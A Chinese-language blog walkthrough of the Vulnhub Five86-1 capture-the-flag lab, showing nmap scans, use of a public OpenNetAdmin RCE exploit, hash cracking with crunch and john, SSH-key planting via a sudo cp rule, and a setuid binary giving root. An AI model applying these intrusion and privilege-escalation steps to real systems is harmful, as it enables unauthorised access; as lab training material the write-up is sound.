devbox
IT小白
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

【Vulnhub】Five86-1

作者:IT小白 | 2024-07-16 22:05:50

five86-1

Description

The ultimate goal of this challenge is to get root and to read the one and only flag.

信息搜集

nmap -sP 192.168.1.0/24

  1. Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 15:02 CST
  2. Nmap scan report for 192.168.1.1
  3. Host is up (0.0021s latency).
  4. MAC Address: C4:F0:EC:7F:52:EC (Fiberhome Telecommunication Technologies)
  5. Nmap scan report for 192.168.1.2
  6. Host is up (0.091s latency).
  7. MAC Address: 20:34:FB:CF:B4:38 (Xiaomi Communications)
  8. Nmap scan report for 192.168.1.4
  9. Host is up (0.074s latency).
  10. MAC Address: 74:23:44:8D:74:79 (Xiaomi Communications)
  11. Nmap scan report for 192.168.1.7
  12. Host is up (0.00032s latency).
  13. MAC Address: B0:35:9F:56:8C:A9 (Intel Corporate)
  14. Nmap scan report for 192.168.1.8
  15. Host is up (0.38s latency).
  16. MAC Address: 34:CE:00:A5:BC:2D (Xiaomi Electronics,co.)
  17. Nmap scan report for 192.168.1.14
  18. Host is up.
  19. Nmap done: 256 IP addresses (6 hosts up) scanned in 132.91 seconds

确定目标为192.168.1.7

探测目标端口开放

nmap -sS -p1-65535 192.168.1.7

  1. Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 15:03 CST
  2. Nmap scan report for 192.168.1.7
  3. Host is up (0.00054s latency).
  4. Not shown: 65532 closed ports
  5. PORT      STATE SERVICE
  6. 22/tcp    open  ssh
  7. 80/tcp    open  http
  8. 10000/tcp open  snet-sensor-mgmt
  9. MAC Address: B0:35:9F:56:8C:A9 (Intel Corporate)
  10.  
  11. Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds

发现80端口开放,先访问80端口服务

url:http://192.168.1.7

打开后是一个白页,尝试访问robots.txt文件,发现/ona

寻找漏洞

先在exploit-db搜一下有没有OPenNetAdminv18.1.1的相关漏洞和exp

获得shell

把第二个exp下载下来,试着利用.

可以用.emmmm,这次获得shell是相当快了,这就是rce漏洞的威力了...

提权

查看www-data用户能访问哪些文件

find / -type f -user www-data

  1. /var/www/html/reports/.htaccess
  2. /var/log/ona.log
  3. /proc/1454/task/1454/fdinfo/0
  4. /proc/1454/task/1454/fdinfo/1
  5. /proc/1454/task/1454/fdinfo/2
  6. /proc/1454/task/1454/fdinfo/12
  7. /proc/1454/task/1454/environ
  8. /proc/1454/task/1454/auxv
  9. /proc/1454/task/1454/status
  10. /proc/1454/task/1454/personality
  11. /proc/1454/task/1454/limits
  12. /proc/1454/task/1454/sched
  13. /proc/1454/task/1454/comm
  14. /proc/1454/task/1454/syscall
  15. /proc/1454/task/1454/cmdline
  16. /proc/1454/task/1454/stat
  17. /proc/1454/task/1454/statm
  18. /proc/1454/task/1454/maps
  19. /proc/1454/task/1454/children
  20. /proc/1454/task/1454/numa_maps
  21. /proc/1454/task/1454/mem
  22. /proc/1454/task/1454/mounts
  23. /proc/1454/task/1454/mountinfo
  24. /proc/1454/task/1454/clear_refs
  25. /proc/1454/task/1454/smaps
  26. /proc/1454/task/1454/smaps_rollup
  27. /proc/1454/task/1454/pagemap
  28. /proc/1454/task/1454/attr/current
  29. /proc/1454/task/1454/attr/prev
  30. /proc/1454/task/1454/attr/exec
  31. /proc/1454/task/1454/attr/fscreate
  32. /proc/1454/task/1454/attr/keycreate
  33. /proc/1454/task/1454/attr/sockcreate
  34. /proc/1454/task/1454/wchan
  35. /proc/1454/task/1454/stack
  36. /proc/1454/task/1454/schedstat
  37. /proc/1454/task/1454/cpuset
  38. /proc/1454/task/1454/cgroup
  39. /proc/1454/task/1454/oom_score
  40. /proc/1454/task/1454/oom_adj
  41. /proc/1454/task/1454/oom_score_adj
  42. /proc/1454/task/1454/loginuid
  43. /proc/1454/task/1454/sessionid
  44. /proc/1454/task/1454/io
  45. /proc/1454/task/1454/uid_map
  46. /proc/1454/task/1454/gid_map
  47. /proc/1454/task/1454/projid_map
  48. /proc/1454/task/1454/setgroups
  49. /proc/1454/task/1454/patch_state
  50. /proc/1454/fdinfo/0
  51. /proc/1454/fdinfo/1
  52. /proc/1454/fdinfo/2
  53. /proc/1454/fdinfo/12
  54. /proc/1454/environ
  55. /proc/1454/auxv
  56. /proc/1454/status
  57. /proc/1454/personality
  58. /proc/1454/limits
  59. /proc/1454/sched
  60. /proc/1454/autogroup
  61. /proc/1454/comm
  62. /proc/1454/syscall
  63. /proc/1454/cmdline
  64. /proc/1454/stat
  65. /proc/1454/statm
  66. /proc/1454/maps
  67. /proc/1454/numa_maps
  68. /proc/1454/mem
  69. /proc/1454/mounts
  70. /proc/1454/mountinfo
  71. /proc/1454/mountstats
  72. /proc/1454/clear_refs
  73. /proc/1454/smaps
  74. /proc/1454/smaps_rollup
  75. /proc/1454/pagemap
  76. /proc/1454/attr/current
  77. /proc/1454/attr/prev
  78. /proc/1454/attr/exec
  79. /proc/1454/attr/fscreate
  80. /proc/1454/attr/keycreate
  81. /proc/1454/attr/sockcreate
  82. /proc/1454/wchan
  83. /proc/1454/stack
  84. /proc/1454/schedstat
  85. /proc/1454/cpuset
  86. /proc/1454/cgroup
  87. /proc/1454/oom_score
  88. /proc/1454/oom_adj
  89. /proc/1454/oom_score_adj
  90. /proc/1454/loginuid
  91. /proc/1454/sessionid
  92. /proc/1454/coredump_filter
  93. /proc/1454/io
  94. /proc/1454/uid_map
  95. /proc/1454/gid_map
  96. /proc/1454/projid_map
  97. /proc/1454/setgroups
  98. /proc/1454/timers
  99. /proc/1454/timerslack_ns
  100. /proc/1454/patch_state
  101. /proc/1456/task/1456/fdinfo/0
  102. /proc/1456/task/1456/fdinfo/1
  103. /proc/1456/task/1456/fdinfo/2
  104. /proc/1456/task/1456/fdinfo/3
  105. /proc/1456/task/1456/fdinfo/4
  106. /proc/1456/task/1456/fdinfo/5
  107. /proc/1456/task/1456/fdinfo/7
  108. /proc/1456/task/1456/fdinfo/8
  109. /proc/1456/task/1456/fdinfo/9
  110. /proc/1456/task/1456/fdinfo/10
  111. /proc/1456/task/1456/fdinfo/12
  112. /proc/1456/task/1456/environ
  113. /proc/1456/task/1456/auxv
  114. /proc/1456/task/1456/status
  115. /proc/1456/task/1456/personality
  116. /proc/1456/task/1456/limits
  117. /proc/1456/task/1456/sched
  118. /proc/1456/task/1456/comm
  119. /proc/1456/task/1456/syscall
  120. /proc/1456/task/1456/cmdline
  121. /proc/1456/task/1456/stat
  122. /proc/1456/task/1456/statm
  123. /proc/1456/task/1456/maps
  124. /proc/1456/task/1456/children
  125. /proc/1456/task/1456/numa_maps
  126. /proc/1456/task/1456/mem
  127. /proc/1456/task/1456/mounts
  128. /proc/1456/task/1456/mountinfo
  129. /proc/1456/task/1456/clear_refs
  130. /proc/1456/task/1456/smaps
  131. /proc/1456/task/1456/smaps_rollup
  132. /proc/1456/task/1456/pagemap
  133. /proc/1456/task/1456/attr/current
  134. /proc/1456/task/1456/attr/prev
  135. /proc/1456/task/1456/attr/exec
  136. /proc/1456/task/1456/attr/fscreate
  137. /proc/1456/task/1456/attr/keycreate
  138. /proc/1456/task/1456/attr/sockcreate
  139. /proc/1456/task/1456/wchan
  140. /proc/1456/task/1456/stack
  141. /proc/1456/task/1456/schedstat
  142. /proc/1456/task/1456/cpuset
  143. /proc/1456/task/1456/cgroup
  144. /proc/1456/task/1456/oom_score
  145. /proc/1456/task/1456/oom_adj
  146. /proc/1456/task/1456/oom_score_adj
  147. /proc/1456/task/1456/loginuid
  148. /proc/1456/task/1456/sessionid
  149. /proc/1456/task/1456/io
  150. /proc/1456/task/1456/uid_map
  151. /proc/1456/task/1456/gid_map
  152. /proc/1456/task/1456/projid_map
  153. /proc/1456/task/1456/setgroups
  154. /proc/1456/task/1456/patch_state
  155. /proc/1456/fdinfo/0
  156. /proc/1456/fdinfo/1
  157. /proc/1456/fdinfo/2
  158. /proc/1456/fdinfo/3
  159. /proc/1456/fdinfo/4
  160. /proc/1456/fdinfo/6
  161. /proc/1456/fdinfo/7
  162. /proc/1456/fdinfo/12
  163. /proc/1456/environ
  164. /proc/1456/auxv
  165. /proc/1456/status
  166. /proc/1456/personality
  167. /proc/1456/limits
  168. /proc/1456/sched
  169. /proc/1456/autogroup
  170. /proc/1456/comm
  171. /proc/1456/syscall
  172. /proc/1456/cmdline
  173. /proc/1456/stat
  174. /proc/1456/statm
  175. /proc/1456/maps
  176. /proc/1456/numa_maps
  177. /proc/1456/mem
  178. /proc/1456/mounts
  179. /proc/1456/mountinfo
  180. /proc/1456/mountstats
  181. /proc/1456/clear_refs
  182. /proc/1456/smaps
  183. /proc/1456/smaps_rollup
  184. /proc/1456/pagemap
  185. /proc/1456/attr/current
  186. /proc/1456/attr/prev
  187. /proc/1456/attr/exec
  188. /proc/1456/attr/fscreate
  189. /proc/1456/attr/keycreate
  190. /proc/1456/attr/sockcreate
  191. /proc/1456/wchan
  192. /proc/1456/stack
  193. /proc/1456/schedstat
  194. /proc/1456/cpuset
  195. /proc/1456/cgroup
  196. /proc/1456/oom_score
  197. /proc/1456/oom_adj
  198. /proc/1456/oom_score_adj
  199. /proc/1456/loginuid
  200. /proc/1456/sessionid
  201. /proc/1456/coredump_filter
  202. /proc/1456/io
  203. /proc/1456/uid_map
  204. /proc/1456/gid_map
  205. /proc/1456/projid_map
  206. /proc/1456/setgroups
  207. /proc/1456/timers
  208. /proc/1456/timerslack_ns
  209. /proc/1456/patch_state

发现/var/www/html/reports/.htaccess,查看一下内容

发现了douglas用户的密码hash,以及密码长度和密码字符集,众所周知john可以结合passwd与shadow文件破解linux密码.

使用crunch生成密码字典

crunch 10 10 aefhrt > pwd.txt   #这里涉及的crunch用法是:crunch min max charsets > outputfile

 使用unshadow生成含有用户信息和密码hash的文件

dpasswd的内容由/etc/passwd得到.

下面使用john破解密码

john --wordlist=pwd.txt hashfile

john不会破解已经破解过的hash,所以会返回这个.但是可以用john --show hashfile来查看已经破解过的.

即用户名:密码=douglas:fatherrrrr

 而后便又是搜集信息,在sudo -l中有发现

 dougals用户可以以jen的身份使用sudo执行/bin/cp,并且不需要jen用户密码.

看到这里大概可以猜到,要提权到root还得先到jen.所以我们可以利用cp命令将我们的ssh公钥添加到jen用户目录下

简单说明一下为何在/tmp目录下进行这些操作.

出题者给用户权限给得很死,非root用户是无法对其他用户目录进行操作的(这才是正确操作),我找了找,发现只有/tmp目录下可以写东西.

当然,douglas用户自己的目录下也可以写东西,但是写了之后是无法使用sudo -u jen cp将东西拷贝到/home/jen里的.因为这条命令是以jen的身份执行的,而jen是没有权限访问douglas目录下文件的.

公钥放置完毕,使用ssh进行jen用户登录.

同样,我还是首先查看jen用户可以访问哪些东西.

find / -type f -user jen 2>/dev/null

发现jen用户的邮件(其实登录成功的时候有提示,最后一句话:You have new mail,不过我没看见)

查看邮件内容

发现moss用户的密码Fire!Fire!

切换成moss用户

su moss

moss下有个隐藏目录.games,里面很多很多游戏,我都大概看了一下,然后可以发现upyourgame很不同

运行upyourgame,随便输内容,成功获得root权限

 为了方便后续访问的话,我会选择添加ssh公钥在root用户下

对了,10000端口的服务是webmin,emmmm不过没用到.

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/836374
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号